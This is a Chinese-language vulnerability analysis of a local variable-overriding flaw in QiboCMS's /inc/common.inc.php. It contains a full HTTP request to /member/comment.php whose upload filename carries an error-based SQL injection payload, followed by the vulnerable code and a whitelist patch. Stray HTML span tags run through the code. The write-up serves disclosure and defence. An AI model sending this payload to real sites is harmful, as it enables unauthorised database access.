QIBO CMS /inc/common.inc.php Local Variables Overriding Vul

目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册，这是模拟了GPC的功能，但同时也引入 " 本地变量

目录

<span>1</span><span>. 漏洞描述
</span><span>2</span><span>. 漏洞触发条件
</span><span>3</span><span>. 漏洞影响范围
</span><span>4</span><span>. 漏洞代码分析
</span><span>5</span><span>. 防御方法
</span><span>6</span>. 攻防思考

 

1. 漏洞描述

齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册，这是模拟了GPC的功能，但同时也引入<span>"</span><span>本地变量覆盖</span><span>"</span>、<span>"</span><span>本地变量未初始化</span><span>"</span><span>的安全风险
齐博CMS中的漏洞文件</span>/inc/common.inc.php使用 @extract($_FILES, EXTR_SKIP)来注册$_FILES的各变量，使用EXTR_SKIP来控制不覆盖已存在的变量。利用一个末初始化的变量覆盖漏洞，即可导致sql注入漏洞

Relevant Link:

http:<span>//</span><span>bbs.qibosoft.com/read-forum-tid-422299.htm</span>

2. 漏洞触发条件

0x1: 攻击入口

构造$_FILE的变量覆盖构造覆盖$cidDB变量，POST给/member/comment.php

<span>1</span>. 首先访问/member下面的<span>"</span><span>评论管理</span><span>"</span><span>功能，抓包

</span><span>2</span><span>. 在http request中构造一个attachment，如下：
</span><span>/*</span><span>
POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1  
Host: 127.0.0.1  
Proxy-Connection: keep-alive  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,</span><span>*/</span>*;q=<span>0.8</span><span>  
User</span>-Agent: Mozilla/<span>5.0</span> (Windows NT <span>6.1</span>; WOW64) AppleWebKit/<span>537.36</span> (KHTML, like Gecko) Chrome/<span>28.0</span>.<span>1500.95</span> Safari/<span>537.36</span> SE <span>2</span>.X MetaSr <span>1.0</span><span>  
Referer: http:</span><span>//</span><span>127.0.0.1/qibo/member/comment.php?job=work  </span>
Accept-<span>Encoding: gzip,deflate,sdch  
Accept</span>-Language: zh-CN,zh;q=<span>0.8</span><span>  
Cookie: PHPSESSID</span>=<span>jo9rpav7l51iakidv01vr9fem1;   
passport</span>=<span>1</span>%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%<span>0922</span>%<span>091425969668</span>%09http%3A%2F%2F127.<span>0.0</span>.<span>1</span>%2Fqibo%2Fmember%2Fcomment.php%3Fjob%<span>3Dwork  
Content</span>-Type: multipart/form-<span>data;   
boundary</span>=----<span>WebKitFormBoundary6ukpBHoIrpHKtOkl  
Content</span>-Length: <span>227</span>  
   
------<span>WebKitFormBoundary6ukpBHoIrpHKtOkl  
Content</span>-Disposition: form-data; name=<span>"</span><span>cidDB</span><span>"</span>; filename=<span>"</span><span>1' and EXP(~(select * from(select user())a)) -- </span><span>"</span><span>  
Content</span>-Type: text/<span>plain  
   
</span><span>1111</span>  
------WebKitFormBoundary6ukpBHoIrpHKtOkl--
*/<span>
注意将原来的URL上的cidDB[]</span>=<span>x删除掉；
然后构造一个文件上传的报文(GET改为POST方法)
在filename处填入注入的payload

</span><span>3</span><span>. 提交该数据包，即可注入成功
</span><span>//</span><span>这次的变量覆盖是抓住了extract的EXTR_SKIP只检查已经存在的变量，但是有些没有声明的变量还是会被覆盖</span>

Relevant Link:

http:<span>//</span><span>bobao.360.cn/learning/detail/291.html</span>

3. 漏洞影响范围

齐博所有系统、所有版本

4. 漏洞代码分析

\qibo\inc\common.inc.php

<span>/*</span><span>
全局变量文件对GPC变量的过滤
从代码中可以看淡，通过$_FILE传的值，POST的内容受GPC影响，因此只能利用$_FILE变量的$key绕过add_S函数
这里，$_FILS在传递参数时，是数组形式，因此可以默认使用$_FILES的$key去覆盖
</span><span>*/</span><span>
$_POST</span>=<span>Add_S($_POST);
$_GET</span>=<span>Add_S($_GET);
$_COOKIE</span>=<span>Add_S($_COOKIE);

function Add_S($array)
{
    </span><span>foreach</span>($array <span>as</span> $key=><span>$value)
    {
        </span><span>if</span>(!<span>is_array($value))
        {
            $value</span>=str_replace(<span>"</span><span></span><span>"</span>,<span>"</span><span>& # x</span><span>"</span>,$value);    <span>//</span><span>过滤一些不安全字符</span>
            $value=preg_replace(<span>"</span><span>/eval/i</span><span>"</span>,<span>"</span><span>eva l</span><span>"</span>,$value);    <span>//</span><span>过滤不安全函数</span>
            !get_magic_quotes_gpc() && $value=<span>addslashes($value);
            $array[$key]</span>=<span>$value;
        }
        </span><span>else</span><span>
        {
            $array[$key]</span>=<span>Add_S($array[$key]); 
        }
    }
    </span><span>return</span><span> $array;
}

</span><span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>))
{
    @extract($_FILES,EXTR_SKIP);
}

</span><span>foreach</span>($_COOKIE AS $_key=><span>$_value)
{
    unset($$_key);
}
</span><span>foreach</span>($_POST AS $_key=><span>$_value)
{
    </span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_POST[$_key];
}
</span><span>foreach</span>($_GET AS $_key=><span>$_value)
{
    </span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_GET[$_key];
}</span>

5. 防御方法

\qibo\inc\common.inc.php

<span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>))
{
    $array </span>= array(<span>'</span><span>Filedata</span><span>'</span>,<span>'</span><span>postfile</span><span>'</span>,<span>'</span><span>upfile</span><span>'</span>,<span>'</span><span>fileData</span><span>'</span>,<span>'</span><span>Filedata</span><span>'</span><span>);
    </span><span>foreach</span>($array AS $key=><span>$value)
    {
        is_array($_FILES[$value]) </span>&& $$value =<span> $_FILES[$value];
    }
}</span>

6. 攻防思考

Copyright (c) 2014 LittleHann All rights reserved